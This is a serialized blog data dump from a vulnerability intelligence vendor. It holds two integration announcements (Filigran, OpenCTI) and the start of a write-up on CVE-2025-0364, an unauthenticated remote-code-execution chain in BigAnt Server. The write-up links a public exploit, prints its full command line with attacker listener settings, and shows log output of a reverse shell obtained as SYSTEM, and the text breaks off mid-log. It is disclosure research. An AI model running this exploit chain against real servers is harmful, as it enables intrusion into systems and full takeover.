within Filigran's XTM framework, which helps organizations understand threat environments, anticipate and detect incidents, and respond effectively to security challenges. This collaboration reinforces Filigran's commitment to providing comprehensive, actionable intelligence that enables security teams to stay ahead of evolving threats.",[61,45274,45275],{"id":13101},[295,45276,13102],{},[18,45278,45279],{},"Explore additional resources to maximize the value of this integration:",[22,45281,45282,45289,45296,45303],{},[25,45283,45284],{},[47,45285,45288],{"href":45286,"rel":45287},"https:\u002F\u002Fdocs.vulncheck.com\u002Fintegrations\u002Fopencti",[51],"VulnCheck Integration Documentation",[25,45290,45291],{},[47,45292,45295],{"href":45293,"rel":45294},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#opencti-vulncheck-connector",[51],"OpenCTI VulnCheck Connector Documentation",[25,45297,45298],{},[47,45299,45302],{"href":45300,"rel":45301},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fopencti-integration",[51],"VulnCheck Integration Announcement",[25,45304,45305],{},[47,45306,45309],{"href":45307,"rel":45308},"https:\u002F\u002Ffiligran.io\u002Fbook-a-demo\u002F",[51],"Request a Demo",[18,45311,45312],{},"Stay tuned for further updates as we continue to expand our joint solution offerings.",{"title":219,"searchDepth":220,"depth":220,"links":45314},[45315,45316,45317,45323,45324,45325,45326,45327],{"id":40710,"depth":220,"text":40713},{"id":45123,"depth":220,"text":45126},{"id":45149,"depth":220,"text":45152,"children":45318},[45319,45320,45321,45322],{"id":45158,"depth":1266,"text":45159},{"id":45165,"depth":1266,"text":45166},{"id":45172,"depth":1266,"text":45173},{"id":45179,"depth":1266,"text":45180},{"id":45186,"depth":220,"text":45189},{"id":45209,"depth":220,"text":45212},{"id":201,"depth":220,"text":202},{"id":1902,"depth":220,"text":1903},{"id":13101,"depth":220,"text":13102},"2025-03-27",{"slug":45330},"vulncheck-filigran-parternship","\u002Fblog\u002Fvulncheck-filigran-parternship",{"title":45091,"description":45113},"blog\u002Fvulncheck-filigran-parternship","n-hOyjcQ8iEnu4h4lgKXoJZdZBmldBpcLwUGnkJabrk",{"id":45336,"title":45337,"articles":7,"authors":45338,"body":45344,"date":45498,"description":45499,"extension":234,"image":7,"link":7,"meta":45500,"navigation":237,"path":45502,"seo":45503,"series":7,"stem":45504,"subtype":7,"tags":45505,"__hash__":45506},"blog\u002Fblog\u002Fopencti-integration.md","Exploring VulnCheck Intelligence in OpenCTI",[45339],{"name":45340,"avatar":45341,"link":45342,"linkName":45343},"EJ Reilly","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U07KQ29RSUT-9e3e3442d4dd-512","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fej-reilly\u002F","in\u002Fej-reilly\u002F",{"type":15,"value":45345,"toc":45493},[45346,45349,45355,45358,45373,45376,45408,45411,45417,45421,45444,45459,45462,45482,45484,45486,45488],[18,45347,45348],{},"VulnCheck is expanding access to its Vulnerability and Exploit Intelligence with a new integration for OpenCTI. Now, VulnCheck customers and community members can seamlessly access VulnCheck intelligence within their OpenCTI deployment.",[18,45350,45351],{},[68,45352],{":width":10862,"alt":45353,"src":45354},"OpenCTI Vulnerability Example","\u002Fblog\u002Fopencti-integration\u002Fvuln-example.png",[61,45356,45357],{"id":28191},"How it works",[18,45359,45360,45361,45366,45367,45372],{},"VulnChecks new integration is an ",[47,45362,45365],{"href":45363,"rel":45364},"https:\u002F\u002Fdocs.opencti.io\u002F6.4.X\u002Fdeployment\u002Fconnectors\u002F#import",[51],"external import connector"," that seamlessly integrates data from VulnChecks API, converting the data to ",[47,45368,45371],{"href":45369,"rel":45370},"https:\u002F\u002Foasis-open.github.io\u002Fcti-documentation\u002Fstix\u002Fintro.html",[51],"STIX objects"," and importing into OpenCTI.",[18,45374,45375],{},"Currently we support several VulnCheck sources, including:",[22,45377,45378,45381,45384,45387,45390,45393,45396,45399,45402,45405],{},[25,45379,45380],{},"VulnCheck KEV: Populates OpenCTI with vulnerabilities actively exploited in the wild, focusing on high-priority risks.",[25,45382,45383],{},"VulnCheck-NVD2 \u002F Nist-NVD2: Imports vulnerability information enriched with CVSS scores, descriptions, and associated CPEs.",[25,45385,45386],{},"Exploits: Maps exploits to vulnerabilities and generates corresponding Malware objects in OpenCTI.",[25,45388,45389],{},"EPSS Enrichment: Adds vulnerabilities along with their EPSS scores and percentiles, helping prioritize remediation efforts based on exploit probability.",[25,45391,45392],{},"Ransomware: Creates Malware objects for ransomware families, linking them to associated vulnerabilities.",[25,45394,45395],{},"Threat Actors: Adds Threat Actor objects with external references, relationships to targeted vulnerabilities, and descriptive metadata.",[25,45397,45398],{},"Botnets: Ingests infrastructure data associated with botnet activities and links them to targeted vulnerabilities.",[25,45400,45401],{},"Initial Access Indicators: Maps CPEs and vulnerabilities leveraged for initial access tactics.",[25,45403,45404],{},"IP Intelligence: Adds infrastructure and IP-related intelligence, including countries and related vulnerabilities.",[25,45406,45407],{},"Snort\u002FSuricata Rules: Ingests Snort and Suricata rules as Indicators.",[18,45409,45410],{},"In aggregation with other threat intelligence providers, VulnChecks data helps create a more enriched and contextual view of the threat intelligence you care about.",[18,45412,45413],{},[68,45414],{":width":10862,"alt":45415,"src":45416},"Shadow Tiger Example","\u002Fblog\u002Fopencti-integration\u002Fshadow-tiger.png",[61,45418,45420],{"id":45419},"how-to-get-started","How to Get Started",[18,45422,45423,45424,45429,45430,45435,45436,45439,45440,45443],{},"To get VulnCheck's connector working in your OpenCTI deployment, you'll first want to take a look at the ",[47,45425,45428],{"href":45426,"rel":45427},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck",[51],"connector's documentation",". In particular the section for ",[47,45431,45434],{"href":45432,"rel":45433},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#vulncheck-connector-configuration",[51],"configuration"," is where you'll find optional configuration parameters for data ingestion. You can use ",[886,45437,45438],{},"CONNECTOR_VULNCHECK_DATA_SOURCES"," to filter on the indices and ",[886,45441,45442],{},"CONNECTOR_SCOPE"," to filter on the scope of STIX objects.",[18,45445,45446,45447,45452,45453,45458],{},"You can run it either as a ",[47,45448,45451],{"href":45449,"rel":45450},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#manual-deployment",[51],"standalone python process"," or in a ",[47,45454,45457],{"href":45455,"rel":45456},"https:\u002F\u002Fgithub.com\u002FOpenCTI-Platform\u002Fconnectors\u002Ftree\u002Fmaster\u002Fexternal-import\u002Fvulncheck#docker-deployment",[51],"containerized environment",". Either way, you get the same threat intelligence data with the same configurable ingestion options.",[18,45460,45461],{},"For more information, check out the resources below:",[22,45463,45464,45469,45475],{},[25,45465,45466],{},[47,45467,45288],{"href":45286,"rel":45468},[51],[25,45470,45471],{},[47,45472,45474],{"href":45293,"rel":45473},[51],"VulnCheck Connector Documentation",[25,45476,45477],{},[47,45478,45481],{"href":45479,"rel":45480},"https:\u002F\u002Fdocs.opencti.io\u002F6.5.X\u002Fdeployment\u002Fconnectors\u002F",[51],"OpenCTI Connector Documentation",[61,45483,202],{"id":201},[18,45485,45062],{},[18,45487,208],{},[18,45489,211,45490,45071],{},[47,45491,216],{"href":214,"rel":45492},[51],{"title":219,"searchDepth":220,"depth":220,"links":45494},[45495,45496,45497],{"id":28191,"depth":220,"text":45357},{"id":45419,"depth":220,"text":45420},{"id":201,"depth":220,"text":202},"2025-03-13","VulnCheck integrates with OpenCTI - an open-source Threat Intelligence Platform by Filigran",{"slug":45501},"opencti-integration","\u002Fblog\u002Fopencti-integration",{"title":45337,"description":45499},"blog\u002Fopencti-integration",[242,1281,23275,1279,33173],"FcI_LhZZwE7uaZ8MPWaWcpNf4Zrr-AL8uEI2G-Y0F7Y",{"id":45508,"title":45509,"articles":7,"authors":45510,"body":45512,"date":53869,"description":53870,"extension":234,"image":7,"link":7,"meta":53871,"navigation":237,"path":53873,"seo":53874,"series":7,"stem":53875,"subtype":7,"tags":53876,"__hash__":53877},"blog\u002Fblog\u002Fbigant-cve-2025-0364.md","BigAnt Small Chain - CVE-2025-0364 Exploitation",[45511],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":45513,"toc":53860},[45514,45517,45526,45530,45542,45545,46431,46434,46438,46441,46452,46458,46461,46467,46470,46481,47065,47077,47573,47600,48108,48119,48654,48657,48814,48821,48827,48833,48837,48855,48935,48944,49547,49553,49559,49576,49585,49589,49595,50282,50295,50302,50352,50358,50364,50373,50379,50853,50868,51664,51667,51713,51716,52395,52398,52402,52409,52415,52437,52443,52446,52452,52455,52461,52464,52467,52491,52494,52500,52507,52513,52516,52520,52523,52566,52576,52579,52965,52972,53814,53817,53819,53844,53857],[18,45515,45516],{},"The BigAntSoft BigAnt Server, which provides a Windows hosted on-premises chat server that focuses on business use cases, is vulnerable to unauthenticated remote code execution via account registration and PHP file uploads. The vulnerability takes advantage of a default exposed SaaS registration that allows an attacker to solve a simple CAPTCHA and then create an administrative user that can upload to the Cloud Storage Add-in. The system allows for the upload of PHP files that can trigger without authentication, leading to a exploit chain of no-authentication to remote code execution in all current, 5.6.06, and below versions.",[18,45518,45519,45520,45525],{},"The VulnCheck team identified this vulnerability during the triage of ",[47,45521,45524],{"href":45522,"rel":45523},"https:\u002F\u002Fgithub.com\u002Fnscan9\u002FCVE-2024-54761-BigAnt-Office-Messenger-5.6.06-RCE-via-SQL-Injection",[51],"CVE-2024-54761",", which turned out to require administrator access and had an incorrect CVSS Privileges Required (PR) value. The VulnCheck team identified a few quick indicators of insecure programming practices and chose to investigate deeper, leading to the discovery of this authentication bypass and file upload remote code execution. At the time of discovery there were roughly 50 BigAnt servers on the internet and at the time of publishing this blog there were around 30 identifiable instances.",[61,45527,45529],{"id":45528},"shells-exploit-preamble","Shells & Exploit Preamble",[18,45531,45532,45533,45537,45538],{},"In summary, an attacker can gain full remote code execution unauthenticated via a chain of 10 requests. The VulnCheck ",[47,45534,1245],{"href":45535,"rel":45536},"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Finitial-access-intelligence",[51]," has published the public exploit: ",[47,45539,45540],{"href":45540,"rel":45541},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2025-0364",[51],[18,45543,45544],{},"The following shows the exploit in action:",[1354,45546,45548],{"className":31740,"code":45547,"language":2186,"meta":219,"style":219},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364 $ .\u002Fbuild\u002Fcve-2025-0364_linux-amd64 -rhost 10.0.0.104 -rport 8000 -lhost 10.0.1.10 -lport 1337 -v -c -e -captcha-hash 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30 -captcha-session 4fbsn0i6bdiuu6vuik99gbhndb -captcha VKZ6\ntime=2025-01-09T14:50:18.502-07:00 level=STATUS msg=\"Certificate not provided. Generating a TLS Certificate\"\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Starting TLS listener on 10.0.1.10:1337\"\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Starting target\" index=0 host=10.0.0.104 port=8000 ssl=false \"ssl auto\"=false\ntime=2025-01-09T14:50:18.575-07:00 level=STATUS msg=\"Validating Bigantsoft Bigant Server target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:50:18.620-07:00 level=SUCCESS msg=\"Target verification succeeded!\" host=10.0.0.104 port=8000 verified=true\ntime=2025-01-09T14:50:18.620-07:00 level=STATUS msg=\"Running a version check on the remote target\" host=10.0.0.104 port=8000\ntime=2025-01-09T14:50:18.650-07:00 level=VERSION msg=\"The reported version is 5.6.06\" host=10.0.0.104 port=8000 version=5.6.06\ntime=2025-01-09T14:50:18.650-07:00 level=SUCCESS msg=\"The target appears to be a vulnerable version!\" host=10.0.0.104 port=8000 vulnerable=yes\ntime=2025-01-09T14:50:18.650-07:00 level=STATUS msg=\"Password that will be used for authentication: kyLZiAddnH\"\ntime=2025-01-09T14:50:18.650-07:00 level=STATUS msg=\"Registering SaaS org: LBJCUE (mpzo@fldlmarv.com) with password: kyLZiAddnH\"\ntime=2025-01-09T14:50:18.675-07:00 level=STATUS msg=\"Getting new PHP session and pinning the SaaS org to the session\"\ntime=2025-01-09T14:50:18.747-07:00 level=STATUS msg=\"Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0\"\ntime=2025-01-09T14:50:18.764-07:00 level=STATUS msg=\"Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3\"\ntime=2025-01-09T14:50:18.765-07:00 level=STATUS msg=\"Activating SaaS organization\"\ntime=2025-01-09T14:50:22.627-07:00 level=STATUS msg=\"Authenticating to the addin SaaS admin\"\ntime=2025-01-09T14:50:22.673-07:00 level=STATUS msg=\"Visiting SaaS addin cloud drive page\"\ntime=2025-01-09T14:50:22.762-07:00 level=STATUS msg=\"Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\"\ntime=2025-01-09T14:50:22.762-07:00 level=STATUS msg=\"Attempting to upload `JQsaYCKEOu.php` to cloud drive addin\"\ntime=2025-01-09T14:50:22.819-07:00 level=STATUS msg=\"Attempting to trigger final payload, timeout is expected after callback\"\ntime=2025-01-09T14:50:22.819-07:00 level=STATUS msg=\"Requesting final payload at: http:\u002F\u002F10.0.0.104:8000\u002Fdata\u002F387360F0-EECD-622B-5B90-C37F2BBD45B3\u002Fpan\u002F99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\u002F2025-01-09\u002FJQsaYCKEOu.php\"\ntime=2025-01-09T14:50:22.821-07:00 level=SUCCESS msg=\"Caught new shell from 10.0.0.104:51690\"\ntime=2025-01-09T14:50:22.821-07:00 level=STATUS msg=\"Active shell from 10.0.0.104:51690\"\nMicrosoft Windows [Version 10.0.17763.107]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nC:\\Program Files (x86)\\BigAntSoft\\IM Console\\im_webserver\\htdocs\\data\\387360F0-EECD-622B-5B90-C37F2BBD45B3\\pan\\99C8911A-DCB3-E5F2-4298-1E3567AA0DAD\\2025-01-09>whoami\nwhoami\nnt authority\\system\n\n",[886,45549,45550,45608,45634,45660,45718,45756,45802,45839,45886,45931,45956,45981,46007,46033,46059,46085,46111,46137,46163,46198,46224,46249,46275,46300,46313,46339,46343,46413,46417],{"__ignoreMap":219},[1373,45551,45552,45555,45558,45561,45563,45566,45569,45572,45574,45577,45579,45582,45585,45588,45590,45593,45596,45599,45602,45605],{"class":1375,"line":1376},[1373,45553,45554],{"class":2206},"poptart@grimm:~\u002Fsrc\u002Finitial-access\u002Ffeed\u002Fcve-2025-0364",[1373,45556,45557],{"class":4640}," $ ",[1373,45559,45560],{"class":1391},".\u002Fbuild\u002Fcve-2025-0364_linux-amd64",[1373,45562,38910],{"class":2209},[1373,45564,45565],{"class":5467}," 10.0.0.104",[1373,45567,45568],{"class":2209}," -rport",[1373,45570,45571],{"class":5467}," 8000",[1373,45573,38916],{"class":2209},[1373,45575,45576],{"class":5467}," 10.0.1.10",[1373,45578,38922],{"class":2209},[1373,45580,45581],{"class":5467}," 1337",[1373,45583,45584],{"class":2209}," -v",[1373,45586,45587],{"class":2209}," -c",[1373,45589,38907],{"class":2209},[1373,45591,45592],{"class":2209}," -captcha-hash",[1373,45594,45595],{"class":1391}," 652def5853ff0030a259b30af8e7facb_6e58b283a2a66e4db833ac2547019a30",[1373,45597,45598],{"class":2209}," -captcha-session",[1373,45600,45601],{"class":1391}," 4fbsn0i6bdiuu6vuik99gbhndb",[1373,45603,45604],{"class":2209}," -captcha",[1373,45606,45607],{"class":1391}," VKZ6\n",[1373,45609,45610,45612,45614,45617,45619,45621,45623,45625,45627,45629,45632],{"class":1375,"line":220},[1373,45611,38930],{"class":4640},[1373,45613,5417],{"class":1397},[1373,45615,45616],{"class":1391},"2025-01-09T14:50:18.502-07:00",[1373,45618,38938],{"class":4640},[1373,45620,5417],{"class":1397},[1373,45622,38943],{"class":1391},[1373,45624,38946],{"class":4640},[1373,45626,5417],{"class":1397},[1373,45628,183],{"class":1387},[1373,45630,45631],{"class":1391},"Certificate not provided. Generating a TLS Certificate",[1373,45633,19057],{"class":1387},[1373,45635,45636,45638,45640,45643,45645,45647,45649,45651,45653,45655,45658],{"class":1375,"line":1266},[1373,45637,38930],{"class":4640},[1373,45639,5417],{"class":1397},[1373,45641,45642],{"class":1391},"2025-01-09T14:50:18.575-07:00",[1373,45644,38938],{"class":4640},[1373,45646,5417],{"class":1397},[1373,45648,38943],{"class":1391},[1373,45650,38946],{"class":4640},[1373,45652,5417],{"class":1397},[1373,45654,183],{"class":1387},[1373,45656,45657],{"class":1391},"Starting TLS listener on 10.0.1.10:1337",[1373,45659,19057],{"class":1387},[1373,45661,45662,45664,45666,45668,45670,45672,45674,45676,45678,45680,45682,45684,45686,45688,45690,45692,45694,45697,45699,45701,45704,45706,45708,45710,45712,45714,45716],{"class":1375,"line":1852},[1373,45663,38930],{"class":4640},[1373,45665,5417],{"class":1397},[1373,45667,45642],{"class":1391},[1373,45669,38938],{"class":4640},[1373,45671,5417],{"class":1397},[1373,45673,38943],{"class":1391},[1373,45675,38946],{"class":4640},[1373,45677,5417],{"class":1397},[1373,45679,183],{"class":1387},[1373,45681,38979],{"class":1391},[1373,45683,183],{"class":1387},[1373,45685,38984],{"class":4640},[1373,45687,5417],{"class":1397},[1373,45689,445],{"class":1391},[1373,45691,38991],{"class":4640},[1373,45693,5417],{"class":1397},[1373,45695,45696],{"class":1391},"10.0.0.104",[1373,45698,38999],{"class":4640},[1373,45700,5417],{"class":1397},[1373,45702,45703],{"class":1391},"8000",[1373,45705,39007],{"class":4640},[1373,45707,5417],{"class":1397},[1373,45709,5971],{"class":1391},[1373,45711,4883],{"class":1387},[1373,45713,39016],{"class":1391},[1373,45715,183],{"class":1387},[1373,45717,39021],{"class":1391},[1373,45719,45720,45722,45724,45726,45728,45730,45732,45734,45736,45738,45741,45743,45745,45747,45749,45751,45753],{"class":1375,"line":4692},[1373,45721,38930],{"class":4640},[1373,45723,5417],{"class":1397},[1373,45725,45642],{"class":1391},[1373,45727,38938],{"class":4640},[1373,45729,5417],{"class":1397},[1373,45731,38943],{"class":1391},[1373,45733,38946],{"class":4640},[1373,45735,5417],{"class":1397},[1373,45737,183],{"class":1387},[1373,45739,45740],{"class":1391},"Validating Bigantsoft Bigant Server target",[1373,45742,183],{"class":1387},[1373,45744,38991],{"class":4640},[1373,45746,5417],{"class":1397},[1373,45748,45696],{"class":1391},[1373,45750,38999],{"class":4640},[1373,45752,5417],{"class":1397},[1373,45754,45755],{"class":1391},"8000\n",[1373,45757,45758,45760,45762,45765,45767,45769,45771,45773,45775,45777,45780,45782,45784,45786,45788,45790,45792,45794,45797,45799],{"class":1375,"line":4724},[1373,45759,38930],{"class":4640},[1373,45761,5417],{"class":1397},[1373,45763,45764],{"class":1391},"2025-01-09T14:50:18.620-07:00",[1373,45766,38938],{"class":4640},[1373,45768,5417],{"class":1397},[1373,45770,39062],{"class":1391},[1373,45772,38946],{"class":4640},[1373,45774,5417],{"class":1397},[1373,45776,183],{"class":1387},[1373,45778,45779],{"class":1391},"Target verification succeeded!",[1373,45781,183],{"class":1387},[1373,45783,38991],{"class":4640},[1373,45785,5417],{"class":1397},[1373,45787,45696],{"class":1391},[1373,45789,38999],{"class":4640},[1373,45791,5417],{"class":1397},[1373,45793,45703],{"class":1391},[1373,45795,45796],{"class":4640}," verified",[1373,45798,5417],{"class":1397},[1373,45800,45801],{"class":1391},"true\n",[1373,45803,45804,45806,45808,45810,45812,45814,45816,45818,45820,45822,45825,45827,45829,45831,45833,45835,45837],{"class":1375,"line":4756},[1373,45805,38930],{"class":4640},[1373,45807,5417],{"class":1397},[1373,45809,45764],{"class":1391},[1373,45811,38938],{"class":4640},[1373,45813,5417],{"class":1397},[1373,45815,38943],{"class":1391},[1373,45817,38946],{"class":4640},[1373,45819,5417],{"class":1397},[1373,45821,183],{"class":1387},[1373,45823,45824],{"class":1391},"Running a version check on the remote target",[1373,45826,183],{"class":1387},[1373,45828,38991],{"class":4640},[1373,45830,5417],{"class":1397},[1373,45832,45696],{"class":1391},[1373,45834,38999],{"class":4640},[1373,45836,5417],{"class":1397},[1373,45838,45755],{"class":1391},[1373,45840,45841,45843,45845,45848,45850,45852,45855,45857,45859,45861,45864,45866,45868,45870,45872,45874,45876,45878,45881,45883],{"class":1375,"line":4768},[1373,45842,38930],{"class":4640},[1373,45844,5417],{"class":1397},[1373,45846,45847],{"class":1391},"2025-01-09T14:50:18.650-07:00",[1373,45849,38938],{"class":4640},[1373,45851,5417],{"class":1397},[1373,45853,45854],{"class":1391},"VERSION",[1373,45856,38946],{"class":4640},[1373,45858,5417],{"class":1397},[1373,45860,183],{"class":1387},[1373,45862,45863],{"class":1391},"The reported version is 5.6.06",[1373,45865,183],{"class":1387},[1373,45867,38991],{"class":4640},[1373,45869,5417],{"class":1397},[1373,45871,45696],{"class":1391},[1373,45873,38999],{"class":4640},[1373,45875,5417],{"class":1397},[1373,45877,45703],{"class":1391},[1373,45879,45880],{"class":4640}," version",[1373,45882,5417],{"class":1397},[1373,45884,45885],{"class":1391},"5.6.06\n",[1373,45887,45888,45890,45892,45894,45896,45898,45900,45902,45904,45906,45909,45911,45913,45915,45917,45919,45921,45923,45926,45928],{"class":1375,"line":4792},[1373,45889,38930],{"class":4640},[1373,45891,5417],{"class":1397},[1373,45893,45847],{"class":1391},[1373,45895,38938],{"class":4640},[1373,45897,5417],{"class":1397},[1373,45899,39062],{"class":1391},[1373,45901,38946],{"class":4640},[1373,45903,5417],{"class":1397},[1373,45905,183],{"class":1387},[1373,45907,45908],{"class":1391},"The target appears to be a vulnerable version!",[1373,45910,183],{"class":1387},[1373,45912,38991],{"class":4640},[1373,45914,5417],{"class":1397},[1373,45916,45696],{"class":1391},[1373,45918,38999],{"class":4640},[1373,45920,5417],{"class":1397},[1373,45922,45703],{"class":1391},[1373,45924,45925],{"class":4640}," vulnerable",[1373,45927,5417],{"class":1397},[1373,45929,45930],{"class":1391},"yes\n",[1373,45932,45933,45935,45937,45939,45941,45943,45945,45947,45949,45951,45954],{"class":1375,"line":4798},[1373,45934,38930],{"class":4640},[1373,45936,5417],{"class":1397},[1373,45938,45847],{"class":1391},[1373,45940,38938],{"class":4640},[1373,45942,5417],{"class":1397},[1373,45944,38943],{"class":1391},[1373,45946,38946],{"class":4640},[1373,45948,5417],{"class":1397},[1373,45950,183],{"class":1387},[1373,45952,45953],{"class":1391},"Password that will be used for authentication: kyLZiAddnH",[1373,45955,19057],{"class":1387},[1373,45957,45958,45960,45962,45964,45966,45968,45970,45972,45974,45976,45979],{"class":1375,"line":4806},[1373,45959,38930],{"class":4640},[1373,45961,5417],{"class":1397},[1373,45963,45847],{"class":1391},[1373,45965,38938],{"class":4640},[1373,45967,5417],{"class":1397},[1373,45969,38943],{"class":1391},[1373,45971,38946],{"class":4640},[1373,45973,5417],{"class":1397},[1373,45975,183],{"class":1387},[1373,45977,45978],{"class":1391},"Registering SaaS org: LBJCUE (mpzo@fldlmarv.com) with password: kyLZiAddnH",[1373,45980,19057],{"class":1387},[1373,45982,45983,45985,45987,45990,45992,45994,45996,45998,46000,46002,46005],{"class":1375,"line":4817},[1373,45984,38930],{"class":4640},[1373,45986,5417],{"class":1397},[1373,45988,45989],{"class":1391},"2025-01-09T14:50:18.675-07:00",[1373,45991,38938],{"class":4640},[1373,45993,5417],{"class":1397},[1373,45995,38943],{"class":1391},[1373,45997,38946],{"class":4640},[1373,45999,5417],{"class":1397},[1373,46001,183],{"class":1387},[1373,46003,46004],{"class":1391},"Getting new PHP session and pinning the SaaS org to the session",[1373,46006,19057],{"class":1387},[1373,46008,46009,46011,46013,46016,46018,46020,46022,46024,46026,46028,46031],{"class":1375,"line":4825},[1373,46010,38930],{"class":4640},[1373,46012,5417],{"class":1397},[1373,46014,46015],{"class":1391},"2025-01-09T14:50:18.747-07:00",[1373,46017,38938],{"class":4640},[1373,46019,5417],{"class":1397},[1373,46021,38943],{"class":1391},[1373,46023,38946],{"class":4640},[1373,46025,5417],{"class":1397},[1373,46027,183],{"class":1387},[1373,46029,46030],{"class":1391},"Retrieving org SSID from demo page with session v1cir7mh9v4dfv4ik54mhq6so0",[1373,46032,19057],{"class":1387},[1373,46034,46035,46037,46039,46042,46044,46046,46048,46050,46052,46054,46057],{"class":1375,"line":4835},[1373,46036,38930],{"class":4640},[1373,46038,5417],{"class":1397},[1373,46040,46041],{"class":1391},"2025-01-09T14:50:18.764-07:00",[1373,46043,38938],{"class":4640},[1373,46045,5417],{"class":1397},[1373,46047,38943],{"class":1391},[1373,46049,38946],{"class":4640},[1373,46051,5417],{"class":1397},[1373,46053,183],{"class":1387},[1373,46055,46056],{"class":1391},"Retrieved SSID for LBJCUE: 387360F0-EECD-622B-5B90-C37F2BBD45B3",[1373,46058,19057],{"class":1387},[1373,46060,46061,46063,46065,46068,46070,46072,46074,46076,46078,46080,46083],{"class":1375,"line":4843},[1373,46062,38930],{"class":4640},[1373,46064,5417],{"class":1397},[1373,46066,46067],{"class":1391},"2025-01-09T14:50:18.765-07:00",[1373,46069,38938],{"class":4640},[1373,46071,5417],{"class":1397},[1373,46073,38943],{"class":1391},[1373,46075,38946],{"class":4640},[1373,46077,5417],{"class":1397},[1373,46079,183],{"class":1387},[1373,46081,46082],{"class":1391},"Activating SaaS organization",[1373,46084,19057],{"class":1387},[1373,46086,46087,46089,46091,46094,46096,46098,46100,46102,46104,46106,46109],{"class":1375,"line":4849},[1373,46088,38930],{"class":4640},[1373,46090,5417],{"class":1397},[1373,46092,46093],{"class":1391},"2025-01-09T14:50:22.627-07:00",[1373,46095,38938],{"class":4640},[1373,46097,5417],{"class":1397},[1373,46099,38943],{"class":1391},[1373,46101,38946],{"class":4640},[1373,46103,5417],{"class":1397},[1373,46105,183],{"class":1387},[1373,46107,46108],{"class":1391},"Authenticating to the addin SaaS admin",[1373,46110,19057],{"class":1387},[1373,46112,46113,46115,46117,46120,46122,46124,46126,46128,46130,46132,46135],{"class":1375,"line":4877},[1373,46114,38930],{"class":4640},[1373,46116,5417],{"class":1397},[1373,46118,46119],{"class":1391},"2025-01-09T14:50:22.673-07:00",[1373,46121,38938],{"class":4640},[1373,46123,5417],{"class":1397},[1373,46125,38943],{"class":1391},[1373,46127,38946],{"class":4640},[1373,46129,5417],{"class":1397},[1373,46131,183],{"class":1387},[1373,46133,46134],{"class":1391},"Visiting SaaS addin cloud drive page",[1373,46136,19057],{"class":1387},[1373,46138,46139,46141,46143,46146,46148,46150,46152,46154,46156,46158,46161],{"class":1375,"line":4915},[1373,46140,38930],{"class":4640},[1373,46142,5417],{"class":1397},[1373,46144,46145],{"class":1391},"2025-01-09T14:50:22.762-07:00",[1373,46147,38938],{"class":4640},[1373,46149,5417],{"class":1397},[1373,46151,38943],{"class":1391},[1373,46153,38946],{"class":4640},[1373,46155,5417],{"class":1397},[1373,46157,183],{"class":1387},[1373,46159,46160],{"class":1391},"Got cloud drive root path UUID: 99C8911A-DCB3-E5F2-4298-1E3567AA0DAD",[1373,46162,19057],{"class":1387},[1373,46164,46165,46167,46169,46171,46173,46175,46177,46179,46181,46183,46186,46188,46191,46193,46196],{"class":1375,"line":4931},[1373,46166,38930],{"class":4640},[1373,46168,5417],{"class":1397},[1373,46170,46145],{"class":1391},[1373,46172,38938],{"class":4640},[1373,46174,5417],{"class":1397},[1373,46176,38943],{"class":1391},[1373,46178,38946],{"class":4640},[1373,46180,5417],{"class":1397},[1373,46182,183],{"class":1387},[1373,46184,46185],{"class":1391},"Attempting to upload ",[1373,46187,19169],{"class":1387},[1373,46189,46190],{"class":2206},"JQsaYCKEOu.php",[1373,46192,19169],{"class":1387},[1373,46194,46195],{"class":1391}," to cloud drive addin",[1373,46197,19057],{"class":1387},[1373,46199,46200,46202,46204,46207,46209,46211,46213,46215,46217,46219,46222],{"class":1375,"line":4947},[1373,46201,38930],{"class":4640},[1373,46203,5417],{"class":1397},[1373,46205,46206],{"class":1391},"2025-01-09T14:50:22.819-07:00",[1373,46208,38938],{"class":4640},[1373,46210,5417],{"class":1397},[1373,46212,38943],{"class":1391},[1373,46214,38946],{"class":4640},[1373,46216,5417],{"class":1397},[1373,46218,183],{"class":1387},[1373,46220,46221],{"class":1391},"Attempting to trigger final payload, timeout is expected after callback",[1373,46223,19057],{"class":1387},[1373,46225,46226,46228,46230,46232,46234,46236,46238,46240,46242,46244,46247],{"class":1375,"line":4952},[1373,46227,38930],{"class":4640},[1373,46229,5417],{"class":1397},[1373,46231,46206],{"class":1391},[1373,46233,38938],{"class":4640},[1373,46235,5417],{"class":1397},[1373,46237,38943],{"class":1391},[1373,46239,38946],{"class":4640},[1373,46241,5417],{"class":1397},[1373,46243,183],{"class":1387},[1373,46245,46246],{"class":1391},"Requesting final payload at: 